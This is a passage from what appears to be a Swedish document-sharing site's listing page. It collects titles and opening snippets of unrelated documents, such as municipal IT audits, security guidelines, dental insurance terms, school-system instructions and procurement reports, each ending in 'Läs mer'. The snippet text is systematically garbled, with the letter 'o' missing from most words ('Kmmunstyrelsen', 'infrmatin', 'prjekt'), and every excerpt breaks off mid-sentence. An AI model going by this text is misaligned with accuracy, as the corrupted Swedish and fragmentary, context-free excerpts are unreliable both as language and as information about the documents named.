rättigheter.

Kommunrevisionen: granskning av generella IT-kontroller 2014

Kommunrevisionen: granskning av generella IT-kontroller 2014 KMMUNLEDNINGSKNTRET Handläggare Ditz Catrin Nilssn Maria Datum 2015-02-03 Diarienummer KSN-2014-1679 Kmmunstyrelsen Kmmunrevisinen: granskning av generella IT-kntrller 2014 Förslag till beslut Kmmunstyrelsen

Läs mer

Riktlinjer för informationssäkerhet. ver 1.0. Antagen av Kommunstyrelsen 2013-05-29

Riktlinjer för informationssäkerhet. ver 1.0. Antagen av Kommunstyrelsen 2013-05-29 Riktlinjer för infrmatinssäkerhet ver 1.0 Antagen av Kmmunstyrelsen 2013-05-29 sid 2 (7) 1. Inledning Tanums kmmuns övergripande styrdkument inm IT-mrådet är IT-plicy för Tanums kmmun. Plicyn är antagen

Läs mer

Instruktioner för mappning av individer till NY-läge

Instruktioner för mappning av individer till NY-läge PM 01-0-5 Genmförandekmmittén för nya Plismyndigheten Ju 01:16 ORG-1 Instruktiner NY-läge Instruktiner för mappning av individer till NY-läge Intrduktin Inm ramen för prjekt ORG-1 har ett förslag till

Läs mer

Risk- och sårbarhetsanalys av SUNET Box för Karolinska Institutet

Risk- och sårbarhetsanalys av SUNET Box för Karolinska Institutet Risk- ch sårbarhetsanalys av SUNET Bx för Karlinska Institutet 2015-01-19 Dnr: 1-35/2015 Innehåll 1. Sammanfattning... 2 2. Bakgrund. 4 3. Nuläge..... 4 4. SUNET Bx i krthet... 5 5. Juridiska aspekter.

Läs mer

Yttrande över Utredningen om genomförande av det moderniserade yrkeskvalifikationsdirektivet (SOU 2014:19)

Yttrande över Utredningen om genomförande av det moderniserade yrkeskvalifikationsdirektivet (SOU 2014:19) Staben Föredragande Magnus Hjrt Biträdande stabschef 072-713 21 03 magnus.hjrt@uhr.se YTTRANDE Diarienummer 1.2.3-3182-2013 Datum 2014-08-22 Pstadress Bx 45093 104 30 Stckhlm Besöksadress Wallingatan 2

Läs mer

Förslag till ändrade rutiner för statliga ålderspensionsavgifter

Förslag till ändrade rutiner för statliga ålderspensionsavgifter 1 (7) PM Förslag till ändrade rutiner för statliga ålderspensinsavgifter Pensinsmyndigheten föreslår att: regleringsbelppet mellan statsbudgeten ch AP-fnden för statliga ålderspensinsavgifter inte fördelas

Läs mer

Regional samverkanskurs 2014

Regional samverkanskurs 2014 L Ä N S S T Y R E L S E N I Ö R E B R O L Ä N Reginal samverkanskurs 2014 Dnr: 455-5818-2014 1 Bakgrund Den första reginala samverkanskursen genmfördes år 1995. RSK 2014 genmfördes 6-11 nvember, den 15:nde

Läs mer

Revisionsrapport 2010 Genomförd på uppdrag av revisorerna i Jönköpings kommun. Jönköpings kommun Granskning av användaradministrationen

Revisionsrapport 2010 Genomförd på uppdrag av revisorerna i Jönköpings kommun. Jönköpings kommun Granskning av användaradministrationen Revisinsrapprt 2010 Genmförd på uppdrag av revisrerna i Jönköpings kmmun Jönköpings kmmun Granskning av användaradministratinen Innehåll 1. Bakgrund ch syfte... 3 2. Metd ch avgränsning... 3 3. Begreppsförklaringar...

Läs mer

Beskrivning av Metakatalog. Sundsvalls kommun

Beskrivning av Metakatalog. Sundsvalls kommun Beskrivning av Metakatalg Sundsvalls kmmun Innehåll 1. ALLMÄNT OM METAKATALOGEN... 3 2. SYFTE... 3 2.1 AUTOMATISERING AV IT-ADMINISTRATION... 3 2.1.1 Effektivisering av IT-administratin... 4 2.2 VIDAREUTNYTTJANDE

Läs mer

Processbeskrivning fakturahantering

Processbeskrivning fakturahantering ST 2013/288-1.1 Prcessbeskrivning fakturahantering Beslutat av Charltte Byström Gäller från 2013-06-12 Innehåll Fakturahantering LNU 3 Fakturahantering 3 Prccessbeskrivning 4 Rller/ansvar 4 Arbetsmment

Läs mer

Guide för hur bildar man en kaninhoppningsklubb ansluten till SKHRF. Även innehållande kunskap om hur man håller möten

Guide för hur bildar man en kaninhoppningsklubb ansluten till SKHRF. Även innehållande kunskap om hur man håller möten Guide för hur bildar man en kaninhppningsklubb ansluten till SKHRF Även innehållande kunskap m hur man håller möten 1 2012-12-27 Hur man bildar en kaninhppningsklubb ch sedan ansluter den till förbundet

Läs mer

ENG-A1004: Information om studierna -övning, hösten 2014

ENG-A1004: Information om studierna -övning, hösten 2014 ENG-A1004: Infrmatin m studierna -övning, hösten 2014 Cntents ENG-A1004: Infrmatin m studierna -övning, hösten 2014... 1 1. Int ch studieguiderna... 2 2. WebOdi... 3 3. Nppa... 4 4. Inside... 5 5. E-pst...

Läs mer

Revisionsrapport. Intern kontroll snöröjning. Vänersborgs kommun. Datum 2011-10-13. Henrik Bergh. Revisionskonsult kommunal sektor

Revisionsrapport. Intern kontroll snöröjning. Vänersborgs kommun. Datum 2011-10-13. Henrik Bergh. Revisionskonsult kommunal sektor Revisinsrapprt Intern kntrll snöröjning Vänersbrgs kmmun Datum 2011-10-13 Henrik Bergh Revisinsknsult kmmunal sektr Innehållsförteckning 1. Uppdrag ch genmförande... 3 2. Sammanfattning... 3 3. Revisinell

Läs mer

AppGate och Krisberedskapsmyndighetens basnivå för informationssäkerhet, BITS

AppGate och Krisberedskapsmyndighetens basnivå för informationssäkerhet, BITS AppGate ch Krisberedskapsmyndighetens basnivå för infrmatinssäkerhet, BITS En intrduktin i säkerhet. AppGate AppGate är ett svenskt säkerhetsföretag med sina rötter inm försvarsindustrin. AppGates teknik

Läs mer

Leverantörsbetalningar

Leverantörsbetalningar Varje år betalar Sveriges 290 kmmuner felaktigt ut hundratals miljner krnr i egentliga eller felaktiga transaktiner. Med några enkla åtgärder skulle en str del av dessa kunna undvikas! Dkumentet avser

Läs mer

KAN MAN KÖPA GRISEN I SÄCKEN PÅ INTERNET?

KAN MAN KÖPA GRISEN I SÄCKEN PÅ INTERNET? SVENSK T!DSKRIFT KAN MAN KÖPA GRISEN I SÄCKEN PÅ INTERNET? MAGNUS NILSSON Tillgängligheten ökar, det blir billigare ch kunderna krnmer i högre utsträckning att styras av varumärken ch ställa högre krav

Läs mer

Mötesanteckningar tredje mötet med Bredbandsforums Mandatgrupp

Mötesanteckningar tredje mötet med Bredbandsforums Mandatgrupp Datum: 2013-06-16 Rev: 2014-06-25 Mötesanteckningar tredje mötet med Bredbandsfrums Mandatgrupp Deltagare: Eva-Marie Marklund Christel Gustafssn Jakim Hlback Gabriella Uhrdin Mikael Sleman Åsa Möller Helena

Läs mer

Ny fastighetsmäklarlag. Vitec Mäklarsystem

Ny fastighetsmäklarlag. Vitec Mäklarsystem Ny fastighetsmäklarlag Vitec Mäklarsystem Juni 2011 Innehållsförteckning 1. Inledning... 2 2. Sammanfattning av den nya fastighetsmäklarlagen... 3 3. Jurnalplikten med checklistr... 4 4. Sidtjänster...

Läs mer

FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING SKYDDA

FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING SKYDDA 1 FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING SKYDDA Denna förköpsinfrmatin innehåller en sammanfattning av de viktigaste villkren avseende Allras Tandvårdsförsäkring Skydda. I försäkringsbrevet,

Läs mer

Checklista förändringsledning best practice Mongara AB

Checklista förändringsledning best practice Mongara AB Checklista förändringsledning best practice Mngara AB Detta dkument ska ses sm ett underlag för vilka frågeställningar vi jbbar med inm ramen för förändringsledning. I dkumentet har vi valt att se prcessen

Läs mer

FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING PREMIUM

FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING PREMIUM 1 FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING PREMIUM Dna förköpsinfrmatin innehåller sammanfattning av de viktigaste villkr avsede Allras Tandvårdsförsäkring Premium. I försäkringsbrevet, ersättningstabell,

Läs mer

Slutrapport Uppdragsutbildning ITM

Slutrapport Uppdragsutbildning ITM Slutrapprt Uppdragsutbildning ITM Upprättad av: Martina Granhlm, ADV Dkumentansvarig: Datum: Larsa Nicklassn, ADV 2013-04-226 Slutrapprt Uppdragsutbildning ITM 1 Bakgrund 3 1.1 Prblemfrmulering 3 1.2 Prjektets

Läs mer

YH och internationalisering

YH och internationalisering YH ch internatinalisering Myndigheten för yrkeshögsklan ISBN-nr: 978-91-87073-25-0 Dnr: MYH 2015/140 Omslagsbild: Bildarkivet 1 (10) Datum: 2014-12-16 Dnr: MYH 2015/140 Rapprt Yrkeshögsklan ch internatinalisering

Läs mer

SchoolSoft 2015-05-05

SchoolSoft 2015-05-05 SchlSft 2015-05-05 Arkivering Nytt läsår Schemasystem: TimeEdit Nedan följer en lista på vad sm bör göras i SchlSft mellan två läsår. Berende på sklans sätt att arbeta kan det finnas mindre avvikelser

Läs mer

Del 5: Rekommendationer och projektrapport

Del 5: Rekommendationer och projektrapport Arkiveringsrekmmendatiner Del 5: Rekmmendatiner ch prjektrapprt fi2 förvaltningsinfrmatin infrmatinsleveranser Prjektet Arkiveringsrekmmendatiner syftar till att ge en genmlysning av knsekvenser för dagens

Läs mer

Processbeskrivning ITIL Change Management

Processbeskrivning ITIL Change Management PrcIT-P-012 Prcessbeskrivning ITIL Change Management Lednings- ch kvalitetssystem Fastställt av IT-chef/biträdande IT-chef 2014-02-06 Innehållsförteckning 1 Inledning 3 1.1 Symbler i prcessbeskrivningarna

Läs mer

Undersökning av seniorers informationsbehov Sundsvalls kommun

Undersökning av seniorers informationsbehov Sundsvalls kommun Undersökning av senirers infrmatinsbehv Sundsvalls kmmun Impera kmmunikatin AB Innehållsförteckning Inledning... 3 Syfte... 3 Metd ch genmförande... 3 Målgrupp ch Svarsfrekvens... 3 Brtfallsredvisning...

Läs mer

SchoolSoft 2015-05-05

SchoolSoft 2015-05-05 SchlSft 2015-05-05 Arkivering Nytt läsår Schemasystem: Utan schemasystem, manuellt schema i SchlSft Nedan följer en lista på vad sm bör göras i SchlSft mellan två läsår. Berende på sklans sätt att arbeta

Läs mer

Styrelse och rektor. Revisionsrapport Upphandling. Internrevisionen Dnr LiU-2008/01363 2008-05-26 1(8) 1. Bakgrund

Styrelse och rektor. Revisionsrapport Upphandling. Internrevisionen Dnr LiU-2008/01363 2008-05-26 1(8) 1. Bakgrund Internrevisinen 1(8) Styrelse ch rektr Revisinsrapprt Upphandling 1. Bakgrund Internrevisinen (IR)har i enlighet med fastställd revisinsplan för verksamhetsåret 2008 utfört granskning av upphandling. Sedan

Läs mer

Exempel på hur Din tandvårdsförsäkring fungerar

Exempel på hur Din tandvårdsförsäkring fungerar 1 FÖRKÖPSINFORMATION FÖR ALLRA TANDVÅRDSFÖRSÄKRING VÅRDA Dna förköpsinfrmatin innehåller sammanfattning av de viktigaste villkr avsede Allras Tandvårdsförsäkring Vårda. I försäkringsbrevet, stabell, de

Läs mer

Kravställ IT system på rätt sätt

Kravställ IT system på rätt sätt Kravställ IT system på rätt sätt Upphandling IT system petter.ulander@adviceu.se 070 2125800 Upphandling IT system Vad behöver vi? En mdern sprtbil? Upphandling IT system En rejäl lastbil? Upphandling

Läs mer

Extra Nyhetsbrev från Kanslistöd

Extra Nyhetsbrev från Kanslistöd Extra Nyhetsbrev från Kanslistöd December månad 2008 Innehållsförteckning Arbetsflöden ch sammanfattande regelverk för kyrkbkföring... 2 Vårdnadshavarna ska vara ense m att barnet ska döpas... 2 Dpförrättaren...

Läs mer

Handikappersättningen

Handikappersättningen Hur mycket får man i Handikappersättningen är 36, 53 eller 69 prcent av prisbasbelppet~( berende på vilket behv du har av hjälp ch hur stra dina merkstnader är på grund av funktinsnedsättningen. Handikappersättning

Läs mer

Rekommendation att publicera datamängder som öppna data

Rekommendation att publicera datamängder som öppna data Tjänsteutlåtande Oöstei 4 ( Kmmunstyrelsens kntr Till Kmmunstyrelsen Datum 2015-04-27 Dnr KS 2015/0178 Rekmmendatin att publicera datamängder sm öppna data Beslutsförslag Kmmunstyrelsen föreslås besluta

Läs mer

Övningar i JavaScript del 5

Övningar i JavaScript del 5 Övningar i JavaScript del 5 I dessa övningar ska vi ta upp några lika händelsehanterare. Dessa ska dck inte läggas in med attribut i HTML-kden, så sm vi gjrt tidigare med nclick. Istället ska vi nu lägga

Läs mer

En kom i gång manual till SPF:s hemsidor

En kom i gång manual till SPF:s hemsidor En km i gång manual till SPF:s hemsidr Inlggning Meny (navigatinsträdet) Vad skall finnas på hemsidan Standarduppgifter [Startsidan, Om föreningen, Styrelsen, Kntakt, Bli medlem] Tilläggs/valfria uppgifter

Läs mer

Bildningsförvaltningens pedagogiska IKT-strategi för skolutveckling med hjälp av digitala verktyg 2013-2016

Bildningsförvaltningens pedagogiska IKT-strategi för skolutveckling med hjälp av digitala verktyg 2013-2016 Rapprt 1 (5) Datum 2013-06-03 Förslag till; Bildningsförvaltningens pedaggiska IKT-strategi för sklutveckling med hjälp av digitala verktyg 2013-2016 IT i sig kan inte förbättra elevernas lärande, däremt

Läs mer

Låneavtal för personlig elevdator

Låneavtal för personlig elevdator Datum 2014-05-15 Avtalsnr. 201401 Sklförvaltningen Bilaga 2 B B Låneavtal för persnlig elevdatr Kristinehamns kmmun 1 Allmänna förutsättningar Kristinehamns kmmun erbjuder eleverna att under sin studietid,

Läs mer

Gemensam upphandling Slutrapport. Hannele Johansson Energikontor Sydost AB

Gemensam upphandling Slutrapport. Hannele Johansson Energikontor Sydost AB Gemensam upphandling Slutrapprt Hannele Jhanssn Energikntr Sydst AB Sammanfattning I mars 2006 startade prjektet Gemensam upphandling på uppdrag av Reginförbundet i Kalmar län. Syftet med prjektet var

Läs mer

BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER

BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER GfNA-II-B-Erasmus+_Annex III_mnbeneficiary_Versin 30-07-2014_sv.dc BILAGA III EKONOMISKA OCH AVTALSMÄSSIGA REGLER Prgrammråde 1 allmänbildande utbildning I. INLEDNING Denna bilaga kmpletterar reglerna

Läs mer

Riktlinjer för externfinansierade forskningsprojekt vid Högskolan i Skövde

Riktlinjer för externfinansierade forskningsprojekt vid Högskolan i Skövde Rektr BESLUT 2015-03-17 Dnr HS Riktlinjer för externfinansierade frskningsprjekt vid Högsklan i Skövde Eknmiavdelningen vid Högsklan i Skövde har riktlinjer för externfinansierade frskningsprjekt. Dkumentet

Läs mer

Kommunstyrelsens Ledningsutskott 2013-11-13 11 (22) BILDANDE AV GEMENSAM VÄXELORGANISATION - INFORMATION Dnr: LKS 2013-424-106

Kommunstyrelsens Ledningsutskott 2013-11-13 11 (22) BILDANDE AV GEMENSAM VÄXELORGANISATION - INFORMATION Dnr: LKS 2013-424-106 LYSEKILS KOMMUN Sammanträdesprtkll Kmmunstyrelsens Ledningsutsktt 2013-11-13 11 (22) 177 BILDANDE AV GEMENSAM VÄXELORGANISATION - INFORMATION Dnr: LKS 2013-424-106 För att kunna möta framtida kmmunikatinsutmaningar,

Läs mer

Kort användarmanual för Test och quiz i Mondo 2.0

Kort användarmanual för Test och quiz i Mondo 2.0 Krt användarmanual för Test ch quiz i Mnd 2.0 Denna användarmanual är en krtversin av en längre användarmanual ch innehåller de viktigaste delarna för att kmma igång med användningen av Test ch quiz. För

Läs mer

Förstudie XBRL Finansiell information

Förstudie XBRL Finansiell information N001 (7) 1 (13) IT-standardiseringsrådet 2014-02-18 Patrick Lindén, +46 8 555 521 56 patrick.linden@sis.se Förstudie XBRL Finansiell infrmatin IT-standardiseringsrådet - ärende N001 XBRL Finansiell infrmatin

Läs mer

YRKESHÖGSKOLEUTBILDNING Medicinsk sekreterare Kristinehamn. Vårdadministratör - ett bristyrke

YRKESHÖGSKOLEUTBILDNING Medicinsk sekreterare Kristinehamn. Vårdadministratör - ett bristyrke YRKESHÖGSKOLEUTBILDNING Medicinsk sekreterare Kristinehamn Vårdadministratör - ett bristyrke Examensarbete 35 päng Författare: Anna Nilssn Handledare: Dris Karlssn Våren 2015 SAMMANFATTNING I detta examensarbete

Läs mer

Eldy Användarhandbo Table of Contents

Eldy Användarhandbo Table of Contents Eldy Användarhandb Table f Cntents Table f Cntents... 2 1. Systemkrav:... 3 2. Hur du installerar Eldy på din PC... 3 2.1 INSTALLATION SCREENSHOTS... 4 2.2 Installatin... 4 3. Börja använda ELDY... 5 4.

Läs mer

Svar på motion från Emil Broberg (V) m.fl Städning av vårdlokaler i egen regi (LiÖ 2015-185)

Svar på motion från Emil Broberg (V) m.fl Städning av vårdlokaler i egen regi (LiÖ 2015-185) Svar på mtin från Emil Brberg (V) m.fl Städning av vårdlkaler i egen regi (LiÖ 2015-185) Mtinärerna berör en viktig fråga. Städning av vårdlkaler utgör en viktig del för att skapa en gd inmhusmiljö för

Läs mer

ArkivDigital. - svensk släktforskning i färg. Av släktforskare För släktforskare

ArkivDigital. - svensk släktforskning i färg. Av släktforskare För släktforskare ArkivDigital - svensk släktfrskning i färg Av släktfrskare För släktfrskare Arkiv Digital har tillkmmit för att förverkliga en släktfrskares dröm m att kunna läsa arkivmaterial på sin datr, sm m han hade

Läs mer

Likabehandlingsplan och årlig plan mot kränkande behandling för Kunskapsskolan Borås läsåret 13 14

Likabehandlingsplan och årlig plan mot kränkande behandling för Kunskapsskolan Borås läsåret 13 14 Likabehandlingsplan ch årlig plan mt kränkande behandling för Kunskapssklan Brås läsåret 13 14 1. Syftet med likabehandlingsarbetet på sklan: Att främja elevernas rättigheter ch att mtverka diskriminering

Läs mer

Tidigt uttag av allmän pension och placering i kapitalförsäkring

Tidigt uttag av allmän pension och placering i kapitalförsäkring 1 (8) PM Dk.bet. 2015-06-08 Analysavdelningen Tidigt uttag av allmän pensin ch placering i kapitalförsäkring Tidigt uttag av allmän pensin ch placering i kapitalförsäkring i krthet: Fördelar: Möjlighet

Läs mer

ABB Sverige har fattat beslut om att samtliga entreprenörer och konsulter skall certifieras i arbetsmiljöoch säkerhet

ABB Sverige har fattat beslut om att samtliga entreprenörer och konsulter skall certifieras i arbetsmiljöoch säkerhet ABB Sverige har fattat beslut m att samtliga entreprenörer ch knsulter skall certifieras i arbetsmiljöch säkerhet Genmförd SSG Entré är en förutsättning för att arbeta åt ABB. Bakgrund Brister i arbetsmiljökmpetens

Läs mer

Vattenfall Innovation Awards

Vattenfall Innovation Awards Vattenfall Innvatin Awards Hantering av Uppfinnare, prcess ch tlkning av legala aspekter Tidsplan: 1. Vattenfalls (VF) utser en intern jury, bestående av ca 10 persner, sm bedömer ch beslutar m vilka idéer

Läs mer

tf'& REGIONFÖRBUNDET JÖNKÖPINGS LÄN Finansieringslots Jönköpings län Science Park Jönköpings län 20 15-01 2016-12 Nytt 100 000 kr

tf'& REGIONFÖRBUNDET JÖNKÖPINGS LÄN Finansieringslots Jönköpings län Science Park Jönköpings län 20 15-01 2016-12 Nytt 100 000 kr Referens Mikael Gustafssn tf'& ~, /jt( 6/!1 tr ;Jt-1. 20141027 Beteckning R12514 Antal sidr 1 (3) Underlag till prjektbeslut Prjektnamn: Prjektägare: År ch månad för prjektstart: År ch månad för prjektavslut:

Läs mer

Samråd för ny- och ombyggnad av väg 226 delen Pålamalm, Flaggplan och Flemingsberg i Huddinge och Botkyrka kommuner

Samråd för ny- och ombyggnad av väg 226 delen Pålamalm, Flaggplan och Flemingsberg i Huddinge och Botkyrka kommuner KOMMUNSTYRELSENS FÖRVALTNING TJÄNSTEUTLÅTANDE DATUM DIARIENR SIDA 2014-12-28 KS-2014/1589.317 1 (2) HANDLÄGGARE Fyrvald, Lena 08-535 313 95 Lena.Fyrvald@huddinge.se Kmmunstyrelsen Samråd för ny- ch mbyggnad

Läs mer

Rådgivningen, kunden och lagen

Rådgivningen, kunden och lagen RAPPORT DEN 11 april 2007 DNR 06-7426-306 2007 : 5 Rådgivningen, kunden ch lagen en undersökning av finansiell rådgivning INNEHÅLL SAMMANFATTNING 1 UTGÅNGSPUNKTER 2 FI pririterar rådgivningen 2 Tidigare

Läs mer

ACD Accelerated Competitive Dialogue

ACD Accelerated Competitive Dialogue 1(6) ACD Accelerated Cmpetitive Dialgue Bertil Danared Accelerated Cmpetitive Dialgue ( ACD ) är en wrkhpbaserad ch interaktiv upphandlingsfrm, där utvalda anbudsgivare bjuds in att på ett strukturerat

Läs mer

En kom i gång manual till SPF:s hemsidor

En kom i gång manual till SPF:s hemsidor En km i gång manual till SPF:s hemsidr Inlggning Meny (navigatinsträdet) Vad skall finnas på hemsidan Standarduppgifter [Startsidan, Om föreningen, Styrelsen, Kntakt, Bli medlem] Tilläggs/valfria uppgifter

Läs mer

Att tänka på inför ekonomiredovisning

Att tänka på inför ekonomiredovisning Att tänka på inför eknmiredvisning Leader Terra et Mare Fregatten 2 444 30 Stenungsund http://www.terraetmare.se Eknmiredvisning görs i samband med varje ansökan m utbetalning (rekvirering av pengar) i

Läs mer

ENERGIKARTLÄGGNING RESIDENSET. Vallgatan 2 Karlskrona. Oktober 2011 EVU AB. Nicklas Ohlsson / Anna Abrahamsson

ENERGIKARTLÄGGNING RESIDENSET. Vallgatan 2 Karlskrona. Oktober 2011 EVU AB. Nicklas Ohlsson / Anna Abrahamsson ENERGIKARTLÄGGNING RESIDENSET Vallgatan 2 Karlskrna Oktber 2011 EVU AB Nicklas Ohlssn / Anna Abrahamssn Innehåll 1. Allmänna uppgifter m uppdraget... 3 1.1 Uppdragets innehåll... 3 1.2 Kntaktpersn under

Läs mer

Vad är kompetens och vad är rätt kompetens?

Vad är kompetens och vad är rätt kompetens? Vad är kmpetens ch vad är rätt kmpetens? Det är dags att börja med att definiera detta. Om du ställer frågan vad behöver man kunna för att utföra sina arbetsuppgifter så blir det ftast lite lättare. Det

Läs mer

Antagningsordning för tillträde till utbildning på grundnivå och avancerad nivå vid Stockholms universitet år 2014

Antagningsordning för tillträde till utbildning på grundnivå och avancerad nivå vid Stockholms universitet år 2014 1 (20) BESLUT 2014-02-18 Dnr SU FV-1.3.1-0488-13 Dk 1 Universitetsstyrelsen Antagningsrdning för tillträde till utbildning på grundnivå ch avancerad nivå vid Stckhlms universitet år 2014 INNEHÅLL 1 Beslut...

Läs mer

Ar.redovlsning.. PensionsförvaJtflingen. *~~e~~~!inget

Ar.redovlsning.. PensionsförvaJtflingen. *~~e~~~!inget Ar.redvlsning.. PensinsförvaJtflingen *~~e~~~!inget *~ 1 LedningsstabenIeknmigruppen Annika Hjertkvist 2007-02-27 LiÖ 2007-18 Landstingsstyrelsen Årsredvisning för pensinsförvaltningen 2006 Sammanfattning

Läs mer

ÅRSRAPPORT AVSEENDE ÅR 2010

ÅRSRAPPORT AVSEENDE ÅR 2010 ÅRSRAPPORT AVSEENDE ÅR 2010 SAMORDNINGSFÖRBUNDET MÖLNDAL PARTILLE HÄRRYDA LERUM ALINGSÅS Finansiell samrdning mellan FÖRSÄKRINGSKASSAN KOMMUNEN ARBETSFÖRMEDLINGEN REGIONEN Sida 1 av 13 FÖRVALTNINGSBERÄTTELSE

Läs mer

Referat från styrelsens möte 18 februari 2014

Referat från styrelsens möte 18 februari 2014 Referat från styrelsens möte 18 februari 2014 Närvarande Ltta Friberg, rdförande Jnas Löhnn, vice rdförande Jhan Sandwall, ledamt Jhannes Kretschmer, ledamt Cicci Anderssn, ledamt Uffe Madsen, ledamt Ali

Läs mer

VÄRMDÖ KOMMUN Yttrande

VÄRMDÖ KOMMUN Yttrande Yttrande Diarienummer: 12KS/0303 Datum: 2012-11-14 Lars Fladvad, utvecklingschef Landstingsstyrelsens förvaltning Bx 22550 104 22 Stckhlm, Yttrande över regeringens bstadsuppdrag till landstinget Bakgrund

Läs mer

~'& .,~, REGIONFÖRBUNDET JÖNKÖPINGS LÄN. Den första ingenjören (DFI) Swerea SWECAST 2014-12 2016-1 2 Nytt. Förstudie

~'& .,~, REGIONFÖRBUNDET JÖNKÖPINGS LÄN. Den första ingenjören (DFI) Swerea SWECAST 2014-12 2016-1 2 Nytt. Förstudie Referens Ola Olssn ~'&.,~, Datum Beteckning R 13014 1 (4) Underlag till prjektbeslut Prjektnamn: Prjektägare: År ch månad för prjektstart: År ch månad för prjektavslut: Status: Den första ingenjören (DFI)

Läs mer

TRANSPORTSKYDD - VÄGTRANSPORTER

TRANSPORTSKYDD - VÄGTRANSPORTER TRANSPORTSKYDD - VÄGTRANSPORTER SPI:s vägledning för skyddsplan i enlighet med ADR-S kapitel 1.10 för tankbilstransprter av petrleumprdukter. Rekmmendatinen är fastställd av SPI:s driftkmmitté i mars 2006

Läs mer

Jazz i Dalarna söker 80 000 kronor för att stödja utvecklingen av Jazzen i länet och fortsätta att lägga fokus på ungdomar. Ansökan gäller för 2010.

Jazz i Dalarna söker 80 000 kronor för att stödja utvecklingen av Jazzen i länet och fortsätta att lägga fokus på ungdomar. Ansökan gäller för 2010. I 11 ~ landstinget DALARNA KUL TUR- OCH BILDNINGSNÄMNDEN 072 BEREDNINGSMEMORIAL Sammanträdesdatum 2011-03-15 12 Jazz i Dalarna - Ung Jazz i Dalarna 2011 Dnr LO 10/03525 Handläggare: Anetfe Stengård Förslag

Läs mer

Ekonomihandbok med tillhörande och närliggande rutiner

Ekonomihandbok med tillhörande och närliggande rutiner Eknmihandbk för spelknvent Versin A, nvember 2009 Författare: Jhan Grth, jhan.grth@ggab.se Eknmihandbk med tillhörande ch närliggande rutiner Revisinshistria Datum Kmmentar Författare 2009-11-20 Ver. A:

Läs mer

Tillgänglighetsguide Lunds kommun... 1. Komma igång... 2. Översikt av Guiden... 1

Tillgänglighetsguide Lunds kommun... 1. Komma igång... 2. Översikt av Guiden... 1 Innehållsförteckning Tillgänglighetsguide Lunds kmmun... 1 Översikt av Guiden... 1 Kmma igång... 2 Sökning ch visning av tillgänglighetsinfrmatin... 2 Resultat av sökning... 3 Rapprtering av nya bjekt

Läs mer

PRINCIPER FÖR TILLGÅNG TILL DEPÅER FÖR KOLLEKTIVTRAFIKEN

PRINCIPER FÖR TILLGÅNG TILL DEPÅER FÖR KOLLEKTIVTRAFIKEN PRINCIPER FÖR TILLGÅNG TILL DEPÅER FÖR KOLLEKTIVTRAFIKEN Ett delprjekt inm Partnersamverkan för en fördubblad kllektivtrafik [Rapprt från en branschgemensam expertgrupp inm Partnersamverkan för en fördubblad

Läs mer

Verksamhetsplan 2015 Regionservice, Region Halland. Samverkad med arbetstagarorganisationerna 2015-02-23

Verksamhetsplan 2015 Regionservice, Region Halland. Samverkad med arbetstagarorganisationerna 2015-02-23 150210 Verksamhetsplan 2015 Reginservice, Regin Halland Samverkad med arbetstagarrganisatinerna 2015-02-23 1. Inledning Varje medarbetare inm Reginservice är en representant för de värderingar sm gäller

Läs mer

IT-strategin ersätter tidigare IT-strategi från 2004-12-16. (CF 10-503/04).

IT-strategin ersätter tidigare IT-strategi från 2004-12-16. (CF 10-503/04). Rektrs beslut Rektr 2011-01-31 MDH1.5-1066/10 Handläggare Tmmy Stridh IT-strategi Beslut Rektr beslutar att fastställa bifgad IT-strategi. IT-strategin ersätter tidigare IT-strategi från 2004-12-16. (CF

Läs mer

Riktlinjer för individuell planering och dokumentation av genomförandet av insatser inom särskilda boenden i Töreboda Kommun

Riktlinjer för individuell planering och dokumentation av genomförandet av insatser inom särskilda boenden i Töreboda Kommun Riktlinjer för individuell planering ch dkumentatin av genmförandet av insatser inm särskilda benden i Törebda Kmmun Beslutat av kmmunstyrelsen 2012-05-02 diarienummer KS 2011/0232 Innehåll 1. INLEDNING...

Läs mer

Rapport rörande det statliga stödet till Skapande skola 2008 inom Stockholm län

Rapport rörande det statliga stödet till Skapande skola 2008 inom Stockholm län KUN 2009-01-22, p 9 Enheten för kultur- ch föreningsstöd Handläggare: Margaretha Häggrth Rapprt rörande det statliga stödet till Skapande skla 2008 inm Stckhlm län 1 Ärendet Landstingets kulturnämnd har

Läs mer

Information vid Föreningsstämma

Information vid Föreningsstämma Infrmatin vid Föreningsstämma Sanne Fiber Eknmisk Förening Versin 1.2 2011-05-11 Göran Sundell AGENDA 2011-05-11 Registrering i röstlängd Infrmatin Kaffepaus Svar på eventuella frågr Stämma Göran Sundell

Läs mer

AVTAL Utförande av Personlig assistans för vuxna i Visby Upphandling 419-01

AVTAL Utförande av Personlig assistans för vuxna i Visby Upphandling 419-01 AVTAL Utförande av Persnlig assistans för vuxna i Visby Upphandling 419-01 Detta avtal har träffats mellan följande parter: Beställare: Entreprenör: Gtlands kmmun/ Scialnämnden Omsrgshuset i Stckhlm AB

Läs mer

Delrapport inom projektet Ombildning av hyresrätter till bostadsrätter inom allmännyttans bestånd 2007-2010.

Delrapport inom projektet Ombildning av hyresrätter till bostadsrätter inom allmännyttans bestånd 2007-2010. Hur ser rdföranden på utvecklingen efter mbildningen? En uppföljning av bstadsrättsföreningar sm bildades 1999-2004 Delrapprt inm prjektet Ombildning av hyresrätter till bstadsrätter inm allmännyttans

Läs mer

Förskolan Västanvind

Förskolan Västanvind Försklan Västanvind Västanvinds plan mt diskriminering ch kränkande behandling (likabehandlingsplan) 2015-05-25 Visin Västanvind är en förskla där alla avsett kön, etnisk bakgrund, religin, funktinshinder,

Läs mer

Landstinget Dalarna. Granskning av finansförvaltningen Rapport. KPMG AB 2011-03-17 Antal sidor: 12

Landstinget Dalarna. Granskning av finansförvaltningen Rapport. KPMG AB 2011-03-17 Antal sidor: 12 en Rapprt KPMG AB Antal sidr: 12 2011 KPMG AB, a Swedish limited liability partnership and a member firm f the KPMG netwrk f independent member firms affiliated with KPMG Internatinal, a Swiss cperative.

Läs mer

Mjukvaror och Tjänster. Hur kan du få ut mer av din printutrustning?

